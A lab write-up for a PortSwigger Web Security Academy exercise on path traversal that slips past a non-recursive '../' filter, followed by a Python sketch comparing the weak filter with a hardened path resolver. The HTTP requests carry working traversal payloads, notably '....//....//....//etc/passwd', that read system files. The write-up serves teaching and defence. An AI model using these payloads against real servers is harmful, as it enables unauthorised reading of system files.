| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Path Traversal (Non-Recursive Stripping) |
| Difficulty | Practitioner |
| Objective | Retrieve the contents of /etc/passwd |
# File Path Traversal, Traversal Sequences Stripped Non-Recursively
A shopping app displaying item images loads something like:
```html
<img src="/image?filename=63.jpg">
```
Intercepting the request in Burp:
```http
GET /image?filename=28.jpg HTTP/2
```
Trying the previous two approaches:
```http
GET /image?filename=../../../../../etc/passwd HTTP/2
```
returns "No such file", and:
```http
GET /image?filename=/etc/passwd HTTP/2
```
also returns "No such file".
So this app strips ../ from the filename before using it, and it does not have the absolute-path issue from the previous lab. If the stripping happens only once (non-recursively), a nested sequence such as ....// survives the filter: removing the inner ../ from ....// leaves the surrounding characters, which re-form ../. Trying:
```http
GET /image?filename=....//....//....//etc/passwd HTTP/2
```
After a single non-recursive strip pass, this collapses to:
```
../../../etc/passwd
```
which is enough traversal depth to reach /etc/passwd.
The contents of /etc/passwd come back, and the lab is solved.
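To make the single-pass stripping concrete, and to show what the handler should have done instead, here is a small added example (not code from the lab or from PortSwigger). The web root /var/www/images and the two resolve functions are assumptions; the filenames are the ones used above.

```python
import posixpath

# Document root the image handler serves from (assumed; the lab does not reveal it).
IMAGE_DIR = "/var/www/images"


def strip_once(filename: str) -> str:
    """The lab's filter as observed: one non-recursive pass that removes every
    '../' occurrence. str.replace() does exactly one left-to-right pass, so
    '....//' loses its inner '../' and the leftover characters re-form '../'."""
    return filename.replace("../", "")


def vulnerable_resolve(filename: str) -> str:
    """Model of the weak handler: strip, then prefix the web root as a string.
    Prefixing (rather than joining) matches the lab, where an absolute
    '/etc/passwd' stayed under the root and produced 'No such file'.
    The result is normalised lexically so this runs offline."""
    return posixpath.normpath(IMAGE_DIR + "/" + strip_once(filename))


def safe_resolve(filename: str):
    """Hardened handler: do not 'clean' the input at all. Join it to the root,
    canonicalise, and refuse anything whose canonical path leaves IMAGE_DIR.
    Returns the path to open, or None when the request must be rejected.
    commonpath() is used instead of startswith() so '/var/www/images2' is
    not mistaken for a child of '/var/www/images'. On a live server use
    os.path.realpath() as well so symlinks cannot escape the root."""
    candidate = posixpath.normpath(posixpath.join(IMAGE_DIR, filename))
    if posixpath.commonpath([IMAGE_DIR, candidate]) != IMAGE_DIR:
        return None
    return candidate


if __name__ == "__main__":
    for name in ("63.jpg", "../../../../../etc/passwd", "/etc/passwd",
                 "....//....//....//etc/passwd"):
        print(f"{name!r:40} weak -> {vulnerable_resolve(name)!r:35} "
              f"hardened -> {safe_resolve(name)!r}")
```

Note that under the hardened handler the ....// payload is not a traversal at all: without the stripping pass, "...." is just a directory name under the root, so the request simply fails to find a file. The filter is what manufactures the ../ sequences.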